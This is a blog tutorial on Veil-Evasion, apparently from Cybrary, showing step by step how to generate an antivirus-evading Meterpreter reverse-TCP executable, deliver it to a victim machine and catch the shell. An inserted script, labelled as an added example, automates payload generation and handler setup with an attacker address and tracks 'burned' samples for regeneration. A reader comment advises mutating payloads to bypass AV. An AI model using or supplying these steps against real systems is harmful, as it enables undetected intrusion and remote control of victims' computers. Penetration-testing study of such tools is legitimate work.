Antivirus Evading Payloads: An Introduction to Veil-Evasion

February 2, 2017


Hi All,

The following article is intended as a brief introduction to Veil-Evasion, the payload-generation component of the Veil-Framework created by Chris Truncer. Veil-Evasion generates a range of payloads built to get past standard endpoint antivirus. Rather than shipping one fixed binary, it produces a freshly encoded or obfuscated executable on every run, so a static signature written for one build should not match the next; that is what gives it an advantage over other payload generators. Bear in mind that this defeats signature matching only: heuristic and behavioural detection, and any scanner that has already seen your particular sample, are a separate problem, which is why the Veil project asks users not to upload generated payloads to online multi-engine scanners. The following example provides a brief overview of generating a payload.

* Veil-Evasion is available from https://github.com/Veil-Framework/Veil-Evasion *

Step 1. Once installed on Kali, launch Veil-Evasion by running “Veil-Evasion.py”.

Image 1

Step 2. Select a payload by entering its associated number (use “list” to view all options).

Image 2

For this example, option 6 [ c/meterpreter/rev_tcp ] was used.

Step 3. Configure the payload with the appropriate parameters, at minimum LHOST and LPORT, the address and port the listener in Step 5 will wait on (the CLI follows Metasploit’s “set OPTION value” convention).

Image 3

To review the current configuration, use “info”.

Step 4. Generate the payload by entering “generate”. You will then be prompted for a name for the output.

Image 4.1

The tool will then provide a summary of the payload you have generated.

Image 4.2

Step 5. In parallel, start a Metasploit listener for the incoming connection: exploit/multi/handler with the payload that matches the one generated (windows/meterpreter/reverse_tcp for c/meterpreter/rev_tcp) and the same LHOST and LPORT that were compiled into the executable. A mismatch in any of the three means the stager connects but no session is created.

Image 5

Step 6. Deliver the compiled payload from “/usr/share/veil-output/compiled” via your chosen attack vector. For this example, Cybrary_example was simply copied onto the victim machine’s desktop. The screenshot below shows a Windows Defender scan that flagged nothing in the payload; note that this reflects the Defender signatures of the day and says nothing about what happens once the executable runs.

Image 6

Step 7. Once the victim runs the malicious .exe, a reverse shell from the target (TOE, target of evaluation) is established with the attacking machine. The Meterpreter session then provides a beachhead for further post-exploitation.

Image 7
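The seven steps above are typed into Veil-Evasion’s interactive menu. The script below is an added example (not code from the article or from the Veil project) that drives the same procedure from the shell and, more importantly, produces a handler resource file whose payload, LHOST and LPORT are guaranteed to match what was compiled into the executable. The Veil-Evasion command-line flags it assembles (-p payload, -c OPTION=value, -o name) are assumed from the Veil-Evasion 2.x command-line help and should be checked against --help on your install; the install path /opt/Veil-Evasion and the attacker address 10.0.0.5:4444 are likewise assumptions, not values from the page.

```sh
#!/bin/sh
# Added example, not code from the article or the Veil project.
# Assumptions (not on the page): Veil-Evasion 2.x flags -p/-c/-o, an install
# path of /opt/Veil-Evasion, and an attacker address of 10.0.0.5:4444.
set -eu

VEIL="${VEIL:-/opt/Veil-Evasion/Veil-Evasion.py}"   # assumed install path
OUTDIR="${OUTDIR:-/usr/share/veil-output/compiled}" # Veil's default output dir

# Map a Veil payload name to the Metasploit payload the handler must use.
# A mismatch here is the usual reason "nothing happens" when the victim runs
# the exe: the stager connects, but the handler speaks the wrong protocol.
# Extend the table from the output of Veil-Evasion's "list" command.
handler_payload() {
  case "$1" in
    c/meterpreter/rev_tcp)      echo windows/meterpreter/reverse_tcp ;;
    python/meterpreter/rev_tcp) echo windows/meterpreter/reverse_tcp ;;
    *) echo "unmapped Veil payload: $1" >&2; return 1 ;;
  esac
}

# Non-interactive equivalent of Steps 2-4: payload, LHOST/LPORT, output name.
veil_cmd() {
  printf '%s -p %s -c LHOST=%s LPORT=%s -o %s\n' "$VEIL" "$1" "$2" "$3" "$4"
}

# Step 5 as an msfconsole resource file. LHOST/LPORT must equal the values
# compiled into the executable, and PAYLOAD must be the mapped one.
handler_rc() {
  msf=$(handler_payload "$1") || return 1
  cat <<EOF
use exploit/multi/handler
set PAYLOAD $msf
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j -z
EOF
}

# Step 6 bookkeeping: hash each build. If a hash you have used before turns
# up in an AV or sandbox report, that sample is burned; regenerate rather
# than reuse it.
payload_fingerprint() {
  sha256sum "$1" | cut -d' ' -f1
}

main() {
  payload=c/meterpreter/rev_tcp; lhost=10.0.0.5; lport=4444; name=Cybrary_example
  echo "# generate (Steps 1-4):"
  veil_cmd "$payload" "$lhost" "$lport" "$name"
  echo "# listener (Step 5), run with: msfconsole -r handler.rc"
  handler_rc "$payload" "$lhost" "$lport"
  exe="$OUTDIR/$name.exe"
  if [ -f "$exe" ]; then
    echo "# sha256 of this build: $(payload_fingerprint "$exe")"
  fi
}

main
```

Redirect the output of handler_rc to a file and start the listener with `msfconsole -r handler.rc` before the payload is delivered; the handler is set to stay up (ExitOnSession false) so a second victim running the same executable also gets a session.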

The above example shows how easily an effective malicious payload can be generated using Veil-Evasion. I strongly recommend investigating the tool for yourself; there is an extensive range of payloads and functions available that this article only touches on. Once more, it is worth noting that Veil-Evasion’s biggest strength is its ability to circumvent anti-virus software. Coupled with a good delivery mechanism, Veil-Evasion is a worthy addition to any PenTester’s arsenal. I hope you found this article informative and thank you for reading. This is my first post, so any constructive criticism or comments are welcome.

This article is intended purely for academic purposes. Neither the author nor Cybrary endorses or takes responsibility for the malicious use of the Veil-Framework. 

8 Comments
  1. All,

    if the traditional AV is detecting your created payload, you need to mutate the payload and it can bypass the traditional bypass. I am not sure if there’s a free version out there to play around with.

    Hope this helps!!

    Thanks
